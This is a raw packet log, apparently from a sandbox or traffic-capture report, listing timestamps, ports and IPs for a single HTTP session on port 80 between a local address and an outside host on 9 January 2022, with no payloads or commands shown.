Jan 9, 2022 18:48:36.021558046 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021596909 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021620035 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021671057 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021672010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021724939 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021773100 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021775961 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021826029 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021872997 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021876097 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021925926 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021970034 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021975040 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.022020102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.022068024 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.022073984 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.022115946 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.022165060 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.283713102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.283788919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.283839941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.283889055 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.283937931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.283988953 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284010887 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.284039974 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284071922 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.284080029 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.284090996 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284142017 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284163952 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.284192085 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284240961 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284290075 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284339905 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284369946 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.284390926 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284440994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284457922 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.284490108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284538984 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284588099 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284634113 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284662008 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.284686089 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284735918 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284775972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.284853935 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.547318935 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547408104 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547466040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547518969 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547571898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547626019 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547633886 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.547683001 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547708035 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.547715902 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.547739029 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547799110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547805071 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.547851086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547904015 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.547960043 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548011065 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548016071 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.548062086 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.548063993 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548115969 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548166037 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548172951 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.548218966 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548269987 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548320055 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548335075 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.548372984 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548424959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548433065 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.548476934 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548528910 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548579931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548599958 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.548626900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.548855066 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.789918900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.810771942 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.810843945 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.810899019 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.810937881 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.810985088 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811041117 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811091900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811090946 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.811136961 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.811142921 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811194897 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811212063 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.811247110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811296940 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811321020 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.811347961 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811398983 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811414957 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.811450958 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811496973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.811502934 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811554909 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811575890 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.811605930 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811659098 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811692953 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.811713934 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811765909 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811811924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811861038 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811909914 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.811911106 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.811960936 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.812020063 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.812021017 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.812062979 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.812144041 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.073535919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073590040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073618889 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073662996 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073694944 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073734999 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073781967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073823929 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073824883 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.073865891 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073908091 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073923111 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.073947906 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.073976994 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.073988914 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074028969 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074057102 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.074065924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074105978 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074141979 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074181080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074213028 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.074222088 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074259996 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074300051 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074305058 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.074341059 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074378967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074418068 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074448109 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.074456930 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074492931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074527979 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.074532986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074567080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.074918032 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.336474895 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.336532116 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.336563110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.336600065 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.336656094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.336713076 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.336767912 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.336813927 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.336812973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.336886883 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.336894035 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.336899042 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.336909056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.336956978 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337014914 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337050915 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.337066889 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337120056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337158918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.337172985 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337238073 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337279081 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.337291002 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337357044 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337394953 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.337404013 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337466002 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.337512016 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337651014 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337713957 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.337790966 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337843895 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337892056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337932110 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.337944984 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.337996006 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338032007 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.338047981 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338097095 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338133097 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.338148117 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338198900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338233948 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.338249922 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338300943 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338342905 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.338352919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338404894 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338442087 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.338455915 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338494062 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338548899 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.338551044 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338603020 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338646889 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.338655949 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338710070 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338748932 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.338762999 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338813066 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338850975 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.338864088 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338912964 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.338949919 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.391902924 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.601087093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601145029 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601174116 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601231098 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601283073 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601311922 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.601334095 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601353884 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.601383924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601387978 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.601433992 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601484060 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.601484060 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601535082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601583004 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601588011 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.601632118 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601677895 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.601680040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601743937 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601789951 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.601794004 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601844072 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601886988 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.601892948 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601943970 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601991892 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.601994991 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.602041960 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.602087975 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.602091074 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.602140903 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.602185965 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.602190018 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.602238894 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.602283001 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.602283955 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.602332115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.602380037 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.602385044 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.602430105 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.602475882 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.602478027 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.657582998 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.863121986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863234043 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863287926 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863327980 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863390923 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863388062 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.863442898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863450050 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.863496065 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863497972 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.863548040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863598108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863601923 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.863648891 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863693953 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.863698959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863759995 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863807917 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.863810062 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863862991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863910913 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.863913059 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.863965988 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864011049 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.864016056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864067078 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864113092 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.864116907 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864164114 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864212990 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864216089 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.864264011 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864310980 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.864315033 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864357948 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864412069 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.864901066 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.864954948 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865005970 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865019083 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865060091 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865107059 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865111113 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865164042 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865211964 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865215063 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865267038 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865310907 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865315914 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865367889 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865412951 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865417004 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865468979 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865518093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865520000 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865569115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865613937 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865618944 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865670919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865715981 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865729094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865792036 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865837097 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865844011 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865895987 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865942955 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.865945101 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.865993023 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.866034031 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:37.866050005 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:37.907864094 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.127140999 CET	80	49854	211.169.6.249	192.168.2.3
